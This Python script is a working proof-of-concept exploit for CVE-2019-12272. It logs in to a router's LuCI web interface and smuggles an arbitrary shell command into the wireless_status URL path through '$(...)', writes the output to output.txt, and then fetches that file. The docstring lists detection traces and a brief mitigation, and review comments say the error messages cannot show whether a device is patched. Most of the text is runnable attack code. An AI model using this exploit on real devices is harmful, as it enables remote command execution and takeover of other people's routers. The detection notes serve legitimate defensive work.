#!/usr/bin/python3
"""Proof of concept for CVE-2019-12272 (identifier taken from the argparse description).

The script logs in to a LuCI web interface with supplied credentials and sends
one POST whose URL path ends in ``eth0$(<command>>output.txt)`` under
``/cgi-bin/luci/admin/status/realtime/wireless_status/``. It then requests
``/output.txt`` from the same host and prints whatever comes back.

Observable traces of the requests made here (useful for detection rules and
for triage of web-server logs):

* a POST to the ``wireless_status`` path whose last segment contains ``$(``;
* LuCI login form fields (``luci_username`` / ``luci_password``) in that POST;
* a GET for ``/output.txt`` directly afterwards;
* the script never removes the file, so ``output.txt`` may remain on the device.

Mitigation: install the vendor fix for the CVE (fixed release: see the
advisory, it is not stated on this page) and keep the LuCI interface
unreachable from untrusted networks.
"""
import argparse
import json

import requests
import urllib3

# Suppress urllib3's InsecureRequestWarning process-wide; the requests below
# pass verify=False.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit(args):
    """Send the two requests of the proof of concept and print the second reply.

    Args:
        args: Parsed command-line namespace providing ``address``,
            ``username``, ``password`` and ``command``.

    Nothing is returned; the outcome is printed to stdout.
    """
    # NOTE(review): the bare ``except`` reports every failure (connection
    # error, missing attribute, even Ctrl-C) as "not exploitable", and the
    # HTTP status of neither response is checked, so an error page from the
    # second request is printed as if it were command output. Neither message
    # is a reliable indication of whether a device is patched.
    try:
        host = args.address
        user = args.username
        secret = args.password
        cmd = args.command

        http = requests.Session()

        # First request: the command's output is redirected into output.txt.
        # The URL is plain http://, so the credentials travel unencrypted and
        # verify=False has no effect on it.
        inject_url = (
            'http://%s/cgi-bin/luci/admin/status/realtime/wireless_status/eth0$(%s>output.txt)'
            % (host, cmd)
        )
        login_form = {'luci_username': user, 'luci_password': secret}
        http.post(url=inject_url, data=login_form, verify=False)

        # Second request: fetch the contents of output.txt.
        result_url = 'http://%s/output.txt' % host
        reply = http.get(url=result_url, verify=False)
        print('[+] out=\n' + reply.text)
    except:
        print('[-] not exploitable')


def main():
    """Parse the four required command-line options and run ``exploit``."""
    parser = argparse.ArgumentParser(description='cve-2019-12272.py')
    required = parser.add_argument_group('required named arguments')

    # (short flag, long flag, help text). The two Chinese help strings mean
    # "address" and "command to execute"; they are runtime text and are kept
    # as the author wrote them.
    options = (
        ('-a', '--address', '地址'),
        ('-u', '--username', 'username'),
        ('-p', '--password', 'password'),
        ('-c', '--command', '待执行命令'),
    )
    for short_flag, long_flag, help_text in options:
        required.add_argument(short_flag, long_flag, help=help_text, required=True)

    exploit(parser.parse_args())


if __name__ == "__main__":
    main()